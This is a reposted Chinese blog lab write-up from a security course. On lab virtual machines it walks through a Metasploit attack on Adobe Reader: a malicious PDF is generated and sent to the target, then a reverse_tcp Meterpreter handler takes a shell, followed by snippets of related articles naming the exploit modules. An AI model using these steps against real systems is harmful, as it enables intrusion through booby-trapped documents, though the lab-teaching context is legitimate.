20145329 《网络对抗技术》客户端Adobe阅读器渗透攻击

最新推荐文章于 2024-08-09 16:15:49 发布
最新推荐文章于 2024-08-09 16:15:49 发布
阅读量168 收藏
点赞数
文章标签: 操作系统 shell 运维
原文链接:http://www.cnblogs.com/jdy1453/p/6719839.html
版权

两台虚拟机:
kali ip:192.168.96.130
windows xp sp3 ip:192.168.96.133

  • 1.kali下打开显示隐藏文件

  • 2.在kali终端中开启msfconsole。

  • 3.进入该漏洞模块并设置攻击有效载荷
    886473-20170416202202415-184950949.jpg

  • 4.查看需要需要设置的数据,并设置相应的参数
    886473-20170416202242852-567396392.png

  • 5.查看设置的参数信息
    886473-20170416202309868-2041623302.png

  • 6.打开exploit生成渗透攻击的pdf文件
    886473-20170416202339837-61561028.png

  • 7.将渗透文件发送到靶机,使用命令back退出当前模块,并使用use exploit/multi/handler新建一个监听模块。
    886473-20170416202854852-1089167580.png

  • 8、使用set payload windows/meterpreter/reverse_tcp建立一个反向连接,并设置相关的端口、ip等信息,需要与之前生成渗透文件的设置一样

  • 9.靶机打开pdf文件,攻击机启动exploit
    886473-20170416203100102-267313851.png

  • 10.sysinfo可以查看到靶机信息(忘了截图)

  • 11.使用ps查看当前进程,并找到explorer.exe的进程号转移到改进程号,输入图shell,获取靶机的shell
    886473-20170416203354352-2059945442.png

转载于:https://www.cnblogs.com/jdy1453/p/6719839.html

dgflxcwno867930904
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Adobe漏洞攻击
七域攻防实验室
08-19 501
开启msfconsole,进入攻击模块 设置攻击载荷payload 设置相关参数 确定需要修改的参数 exploit生成5303.pdfpdf复制到靶机里 启动监听端 设置参数 攻击 获得靶机的信息 查看 文章思绪来源于 ...
20145322 Exp5 Adobe阅读器漏洞攻击
04-17 128
20145322 Exp5 Adobe阅读器漏洞攻击 实验过程 IP:kali:192.168.1.102 windowsxp :192.168.1.119 msfconsole进入控制台 使用命令为 use windows/fileformat/adobe_cooltype_sing进入攻击模块 设置攻击载荷payloads ,命令为set payloads windows/meter...
Adobe软件存在漏洞 危及所有网络视频业务
tingqier的专栏
09-27 573
通过互联网传输视频内容的Adobe软件存在一处安全漏洞,用户可以免费从亚马逊的流式视频服务中录制电影和电视节目。这一问题会使网络视频内容被疯狂盗版,严重影响零售商、电影公司和电视网络利用庞大网民用户群赚钱的计划。英国电信公司安全技术总监布鲁斯·施奈德 (BruceSchneier)说,这是Adobe软件中的一处基础性缺陷,非常愚蠢。该缺陷存在于Adobe的Flash视频服务器软件中,该
2018-2019-2 20165303《网络攻防技术》Exp5 MSF基础应用
weixin_34247032的博客
04-13 128
实践目标 1.一个主动攻击实践 ms17_010(成功) ms08_067(成功) 2.一个针对浏览器的攻击 ms13-008(成功唯一) ms11-050(失败) ms13-069(成功唯一) adobe_toolbutton浏览器漏洞(成功唯一) 3.一个针对客户端攻击 adobeAdobe_toolbutton客户端漏洞成功) 4.成功应用任何一个辅助模块 au...
客户端渗透之——对网站的客户进行渗透
冰河的专栏
01-24 1438
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86632147 本次的渗透主要是找到有漏洞的网站,在有漏洞的网站中嵌入隐藏的iFrame,那么访问这个网站的所有系统都会遭受来自browser autopwn服务器的攻击。我们可以利用iFrame注入实现对网站用户的大规模入侵。 攻击网站的用户 具体实施 首先,我们要获...
2017-2018-2 20155230《网络对抗技术》实验5:MSF基础应用
aohuang6078的博客
04-30 162
基础问题回答 用自己的话解释什么是exploit,payload,encode. exploit 就是运行该模块吧,在msf的模块中配置好各项属性后exploit一下就开始运行使用该模块了 payload 是攻击载荷的统称,我们需要配置攻击载荷来选择获取靶机shell的方式 encode 编码,是一种免杀的方式 实践过程记录 1、一个主动攻击实践 打开终端输入msfconso...
[漏洞复现] CVE-2010-2883 Adobe Reader 打开pdf即刻中招
weixin_33845477的博客
04-03 342
1、漏洞概述在“漏洞界”,据称有两种大山是其他软件永远无法匹敌的,一个是Microsoft的Office套件,一个是Adobe的全家桶。这两家出的漏洞,无论在出洞频率、***危害性、或者是影响范围等多个维度来看,都直接将其他软件远远甩开。如果要较真起来,到底谁是“漏洞之王”?相信Adobe一定能“摘得桂冠”。Adobe全家桶里面的Adobe Flash Player、Adob...
2018-2019-2 20165315《网络攻防技术》Exp5 MSF基础应用
weixin_34401479的博客
04-16 161
2018-2019-2 20165315《网络攻防技术》Exp5 MSF基础应用 目录 一、实验内容 二、实验步骤 1、一个主动攻击实践 ms08_067(成功) 2、一个针对浏览器的攻击,如ms11_050; ms11_050(成功) 3、一个针对客户端攻击,如AdobeAdobe(尚未成功,任需努力) Wireshark(成功) 4、成功应用任何一个辅助模块 sniffe...
2018-2019-2 20165302 Exp5 MSF基础应用
weixin_34357962的博客
04-14 134
1.实验目的 掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路 2.实验内容 一个主动攻击实践; (1分) MS17-010 一个针对浏览器的攻击;(1分) ms14_064 一个针对客户端攻击,如Adobe;(1分) exploit/windows/fileformat/adobe_utilprintf 成功应用任何一个辅助模块。(0.5分) auxiliary/scan...
2018-2019-2 《网络对抗技术》Exp5 MSF基础应用 Week7-8 20165233
ahgq78625的博客
04-15 251
Exp5 MSF基础应用 目录 一、基础问题 二、攻击实例 主动攻击 ms08_067_netapi(成功) ms10_061_spoolss(失败) 针对浏览器的攻击 ms14_064_ole_code_execution(成功) ms16_051_vbscript(失败) 攻击客户端的实践 adobe_toolbutton(成功) ms10_087_rtf_pfragm...
Adobe Reader 缓冲区溢出漏洞 (CVE-2010-2883)漏洞分析报告
君子谬
11-28 2108
一. 简介   软件名称:Adobe Reader 影响范围:7.0.0-9.3.4版本 影响平台:Windows 漏洞模块:CoolType.dll 威胁等级:高危 漏洞类型:缓冲区溢出 威胁路径:远程 机密性影响:完全的信息泄露导致所有系统文件暴露 完整性影响:系统完整性可被完全破坏 可用性影响:可能导致系统完全宕机 攻击复杂度:漏洞利用存在一定的访问条件 攻击向量:
客户端渗透之——基于PDF文件格式的渗透攻击
冰河的专栏
01-24 2641
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86633022 攻击机 Kali 192.168.175.128 靶机 WinXP 192.168.175.130 漏洞程序: Adobe Reader 9.0 1.生成PDF文件 msfconsole use exploit/windows/fileformat/ad...
打造智能障碍物检测系统:从零开始的深度学习项目
a871923942的博客
08-05 1060
随着自动驾驶技术的发展,障碍物检测成为保障行车安全的重要一环。通过深度学习模型,尤其是YOLO(You Only Look Once)模型,可以高效、准确地检测道路上的障碍物,从而提高自动驾驶系统的安全性和可靠性。
【Linux 从基础到进阶】进程管理与性能调优
weixin_39372311的博客
08-08 350
通过本文的介绍,您已经了解了 Linux 系统中进程管理和性能调优的基本概念和操作方法。本文提供了适用于 CentOS 和 Ubuntu 系统的具体命令和示例,涵盖了 CPU、内存、I/O 和网络的性能调优策略。合理的进程管理和性能调优可以显著提升系统的稳定性和运行效率。如有任何问题或需要进一步的帮助,请参考CentOS 官方文档和Ubuntu 官方文档或在 CSDN 博客中查阅相关内容。
鸿蒙Image组件设置长按手势回调事件
qq_36859035的博客
08-08 218
Image组件默认是可拖拽的,给Image组件设置draggable为false,即可成功触发长按事件:
48天笔试训练错题——day44
ミカミミミ博客
08-08 737
48天笔试训练错题——day44.
linux安装weblogic
m0_46400195的博客
08-05 829
域文件位置就是python文件中设置的,位置(cd /root/web/weblogic/softWare/projects/doamins/testDomain)(以自己python为主)想要启动weblogic 12版本及以后都需要去oracle_common目录下配合启动脚本进行服务器启动。weblogic不允许root用户进行安装,所以要提前创建weblogic用户来进行安装。例如:http://192.168.0.143:7001/console。用户名:启动weblogic的用户名。
Linux 下 perf 的使用
Teminator_的博客
08-05 4299
perf 是一个性能分析工具(基于 Linux 内核提供的性能事件perf_event口),用于对 Linux 系统进行性能调优和性能分析。它可以通过收集硬件性能计数器、跟踪系统事件和采样程序调用栈等方式来提供详细的性能统计信息。perf 依赖事件进行统计,这里的事件是通过采样机制,并不是 clock 级别的统计;根据使用 perf 工具的不同按测量事件的类型进行统计。
Kafka和Zookeeper的安装与使用指南
最新发布
AngelCryToo的专栏
08-09 443
在分布式系统的世界中,Kafka是一种高性能的消息队列系统,而Zookeeper则作为分布式协调服务的基础工具之一,为Kafka的高效运行提供支持。本指南将详细介绍在Windows和Linux系统中安装和配置Zookeeper和Kafka的步骤,并包含一些常用命令和经验总结,帮助你更好地掌握这些工具。
CLion运行C++程序
yinjl123的博客
08-06 251
【代码】CLion运行C++程序。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值